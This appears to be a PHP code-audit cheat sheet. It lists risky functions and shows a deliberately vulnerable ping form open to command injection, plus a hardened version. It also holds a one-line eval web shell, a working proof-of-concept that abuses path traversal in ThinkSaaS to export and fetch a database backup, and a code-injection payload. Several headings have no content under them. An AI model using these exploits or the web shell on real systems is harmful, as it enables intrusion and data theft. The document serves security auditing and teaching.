PHP code audit
Code-audit helper tools
https://github.com/WhaleShark-Team/cobra
https://github.com/LoRexxar/Kunlun-M
Variable overwriting
extract()
import_request_variables()
parse_str()
mb_parse_str()
register_globals
Variable initialization by iterating over input arrays
file_get_contents() check bypass
(1) bypass with the php://input pseudo-protocol (2) bypass with the data:// pseudo-protocol
RCE
RCE functions
PHP: eval, preg_replace with the /e modifier, assert; JavaScript: eval; VBScript: Execute, Eval; Python: exec
<?php include($_SERVER['DOCUMENT_ROOT'].'/btslab/header.php'); ?>
<br/><b>Ping:</b>Please Enter Domain Name or IP Address:
<br/><br/>
<form action="cmd.php" method="get">
  <input type="text" name="host" value=""/>
  <br/><br/><input type="submit" name="Go" value="Go"/>
</form>
<br/>
<?php
if(isset($_GET['host'])) {
    // $_GET['host'] is concatenated into the shell command unquoted and
    // unvalidated, so shell metacharacters in it are executed (command injection)
    if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
        $result=shell_exec("ping ".$_GET['host']);
    } else {
        $result=shell_exec("ping -c 4 ".$_GET['host']);
    }
    // the raw output is echoed without HTML escaping
    echo "<b>Result:</b></br><pre>".$result."</pre>";
}
?>
<?php include($_SERVER['DOCUMENT_ROOT'].'/btslab/footer.php'); ?>
<?php eval($_REQUEST['code']); ?>
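A hardened counterpart to the ping handler above, added here as an example (it is not code from the original page): the host is checked against an allow-list shape (IP literal or hostname) before it reaches the shell, the only variable part of the command is quoted with escapeshellarg(), and the output is HTML-escaped. The function names validate_host and safe_ping are assumptions.

```php
<?php
// Hardened version of the vulnerable ping form above (added example).
// Defence 1: allow-list the input shape (IPv4/IPv6 literal or RFC 1123 hostname).
// Defence 2: quote the argument with escapeshellarg() so ; | & ` $( ) and
//            friends are never interpreted by the shell.
// Defence 3: keep the binary and its options fixed; only the host varies.

// validate_host and safe_ping are hypothetical names chosen for this example.
function validate_host(string $host): bool
{
    if ($host === '' || strlen($host) > 253) {
        return false;
    }
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    // Hostname labels: alphanumerics and hyphens, 1-63 chars, no leading or
    // trailing hyphen, dot separated.
    return (bool) preg_match(
        '/^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$/',
        $host
    );
}

function safe_ping(string $host): ?string
{
    if (!validate_host($host)) {
        return null; // reject instead of trying to "clean" the input
    }
    $isWindows = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN';
    $cmd = $isWindows
        ? 'ping ' . escapeshellarg($host)
        : 'ping -c 4 ' . escapeshellarg($host);
    return shell_exec($cmd);
}

if (isset($_GET['host'])) {
    $result = safe_ping((string) $_GET['host']);
    if ($result === null) {
        echo '<b>Error:</b> invalid host name or IP address.';
    } else {
        // ping echoes the host back, so escape the output to close the XSS as well
        echo '<b>Result:</b><br/><pre>'
            . htmlspecialchars((string) $result, ENT_QUOTES, 'UTF-8')
            . '</pre>';
    }
}
```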
LFI -> downloading backup files
<?php
// Plugin conditional entry point: $app, $plugin and $in come from the request
// and reach the include path unfiltered, so "../" in $in reaches any action file.
defined('IN_TS') or die('Access Denied.');
if(is_file('plugins/'.$app.'/'.$plugin.'/'.$in.'.php')){
    require_once('plugins/'.$app.'/'.$plugin.'/'.$in.'.php');
}else{
    tsNotice('sorry:no plugin!');
}
?>

<?php
// The database backup action that the include above can be pointed at
defined('IN_TS') or die('Access Denied.');
switch($ts){
    case "":
        // list the backup files
        $arrSqlFile = tsScanDir('data/baksql','file');
        include template('sql');
        break;
    // optimize
    case "optimize":
        $arrTables = $db->fetch_all_assoc("SHOW TABLES");
        foreach($arrTables as $key=>$item){
            $db->query("OPTIMIZE TABLE `".$item."` ");
        }
        qiMsg('优化数据库成功!');
        break;
    // backup export
    case "export":
        require_once 'thinksaas/DbManage.php';
        $bakdb = new DBManage ( $TS_DB['host'].':'.$TS_DB['port'], $TS_DB['user'], $TS_DB['pwd'], $TS_DB['name'], 'utf8' );
        $bakdb->backup ('','data/baksql/');
        qiMsg('数据库备份完毕!');
        break;
}
?>

<?php
// Proof of concept as given on the page: trigger the export through the
// traversal, then look for the timestamp-named dump in data/baksql/
date_default_timezone_set('Asia/Hong_Kong');
$url = "http://192.168.116.129/thinksaas/index.php?app=user&ac=plugin&plugin=face&in=my5t3ry/../../../../app/system/action/sql&ts=export";
file_get_contents($url);
$time = date('YmdHis');
for($i = $time; $i <= $time + 300; $i++){
    $filename = $i ."_all_v1.sql";
    $url = "http://192.168.116.129/thinksaas/data/baksql/".$filename;
    if (@file_get_contents($url, null, null, -1, 1)){
        echo $url;
    }
}
?>
PHP MD5 bypass - scientific-notation (loose comparison) bypass
PHP MD5 bypass - array bypass of strict comparison (===)
Deserialization
__construct()
__destruct()
__call()
__callStatic()
__get()
__set()
__isset()
__unset()
__sleep()
__wakeup()
__toString()
__invoke()
__set_state()
__clone()
__debugInfo()
unserialize()
File write
file_put_contents()
Payload:
');phpinfo();exit();// (adjust the '); prefix to the surrounding code)
SQLI
update()
XSS
Open-source projects
https://github.com/bowu678/php_bugs